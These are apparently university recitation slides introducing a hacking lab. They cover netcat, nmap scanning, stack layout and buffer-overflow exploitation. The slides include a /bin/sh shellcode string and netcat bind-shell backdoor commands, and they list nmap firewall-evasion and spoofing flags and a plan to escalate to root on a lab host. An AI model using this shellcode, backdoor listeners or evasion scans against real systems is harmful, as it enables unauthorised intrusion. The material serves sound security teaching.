Security 101 CPS 110 Recitation Amre Shakimov Duke University © Sam McIngvale, Whitney Young, Yan Chen Northwestern university “Weak Link” of any System/Program? PROGRAMMER & USERS Overview • “C00L t00lz” for “hacking” :) • Project 3 overview and few hints telnet • telnet is used for communication with another host using the TELNET protocol. – $ telnet www.cs.duke.edu 80 • telnet is useful for network interaction with servers • telnet traffic is not encrypted and therefore not secure netcat • The TCP/IP swiss-army knife • netcat is a simple UNIX utility that reads and writes data across network connections. • Simplest usage: – $ nc host port – Creates a TCP connection to the given port on the target host. Standard input is sent to the host and anything that comes back is standard output. Advanced netcat • Transferring files – Set-up receiving host to listen on a specific port and put all received data into a file (remember to set a time- out) • $ nc -vvn -l -p 3000 > file – -l (listens for incoming connections), -vv (verbosity level), -w (timeout), -n (don't reslove Ips) – Set-up sending side to connect to listening host and send a file • $ nc -vvn xxx.xxx.xxx.xxx 3000 < file Nmap • Nmap (“network mapper”) is an open-source port/ security scanner. – http://insecure.org/ • It’s primary function is the discovery and mapping of hosts on a network. – We will use Nmap for port-scanning. • Nmap is consistently voted as one of the most used security tools. Nmap • Nmap is capable of: – Host Discovery – Identifying computers on a network. – Port Scanning – Enumerating the open ports on one or more target computers. – Version Detection – Interrogating listening network services listening on remote computers to determine the application name and version number. – OS Detection – Remotely determining the operating system from network devices. Power of nmap Nmap • Note: must be root to run Nmap – Nmap crafts raw packets and sends them over the network interface...on Linux you must be root to use this capability. • use sudo Nmap • Command line options – Host Discovery: • -P0 treat all hosts as online (skip host discovery) – Scan Techniques: • -sS/sT/sA/sW/sM tcp syn/connect/ack/window/maimon scans • -sN/sF/sX tcp null/fin/xmas scans – Port Specification • -p <port ranges> only scan specified ports -p 22, -p 1-65535, Nmap • More Command Line Options – Service/Version Detection • -sV probe open ports to determine service/version info – OS Detection • -O enable OS detection • -A enables OS detection and version detection – Firewall/IDS Evasion • -f fragment packets • -S spoof source address • -g use given port number Nmap • Typical Nmap command line: – $ nmap -A -sS -P0 -p 1-65535 scanme.nmap.org • Try it! netstat/ps • Once you have access to a box...what do you do? • Two useful tools are netstat and ps – netstat – ps ps • To see all processes you are running – $ ps • To see all processes running on the machine • $ps ax • $ps aux (to see user information) • To see all processes root is running – $ps aux | grep root Source Code Availability • In general, we will always have source code available for analysis. – This mirrors real-world situations. Imagine downloading a program from source. • Things can get tricky when source code is not available. – Bruteforcing becomes extremely helpful. – Reverse engineering is another option. Project 3 • The goal is to learn security by learning how to view your machine as a 'hacker' • Can be extremely easy (few hours of work) • Can be extremely difficult (sleepless nights) • Coding is tiny (max 20-30 lines) • Code requires a lot of thinking (1 byte may change everything) • We will be happy to help but only with concepts What you will do in Project 3 • Scan host for open ports (use nmap + parameters) • Determine what service is vulnerable (use nc and simple program) • Write exploit for this service (nc is not enough) and get shell for this machine (source will be available) • Go inside and explore (goal: obtain password for this user – not-root yet) • Exploit different SUIID programs to get root- privileges • Done! (we need all commands you used and source code of all exploits) Stack Revisited • Structure • Frame • Ret Address • Why do we care? Stack Structure • The stack is used for storing runtime information about function calls – Stored in “Stack Frames” • Stack structure is processor-dependent – x86, PPC, Sparc • x86 is the dominant architecture for personal computers Stack Frame int func(int arg1, int arg2) { char buffer[64]; return 1; } Frame pointer arg2 (ebp) arg1 ret ebp Stack pointer (esp) buffer We want to overwrite the return address Ultimate Goal • In order of importance (to us) – Get root access – Get any access (because it might lead to root access through another vulnerability) • To launch a shell – system(“/bin/sh”) How to Get a Shell • Return to a place in the code that executes a shell – system(“/bin/sh”) • What if there is no code in the program that executes a shell? – Shellcode – Inject code into the application as a string Shellcode • Shellcode is compiled code in string format that can be executed to get an interactive shell char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07" "\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d" "\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80" "\xe8\xdc\xff\xff\xff/bin/sh"; Shellcode • Hard to write – Architecture-dependent – Must remove all string-delimiting characters • Easy to find * – Aleph1's Smashing the Stack * you need to understand what it does (don't execute shellcode of “rm -Rf ~/” on your machine :)) * Think about shellcode for the Project (launching /bin/sh is not enough for remote exploit). Injecting Shellcode • Standard method – Usually, shellcode is stored directly in the buffer that's being overflowed • Alternate methods – Environment variables – Configuration files Remote Issues • How to get a shell across a network – Different shellcode • Determining stack information without debugger • Can't use environment variables or configuration files for shellcode injection Assumptions • Return location on the stack is known – This doesn't hold – the stack addresses are affected by the environment in which the program was started • Shell will be executed locally – We want to be able to attack remote machines Overcoming Assumptions • How to deal with changing stack location – Brute force – Nops • How to get a remote shell – Really complicated shellcode Brute Forcing With Nops • Guess every possible return address in address space until getting a shell – Infeasible with 4GB address space (imagine 64bit machines) • Adding nops – Like a ; in C code – doesn't do anything – Adding 200 nops allows the search time to be decreased by a factor of 200 Remote Shell • There are many solutions • One example Create shellcode from: nc -l -p 8000 -c '/bin/sh' Connect and get shell with: nc server_address 8000 Advanced netcat • Shell shoveling using TCP (simple backdoor) – If there is no firewall protecting the target, or if there is a misconfiguration (tcp/53 to all hosts), an attacker can put up a nc-listener that shovels back a shell • $ nc -l -p 53 -e /bin/sh – -e (execute command on connection) – Then, just connect to the target • $ nc target_ip port .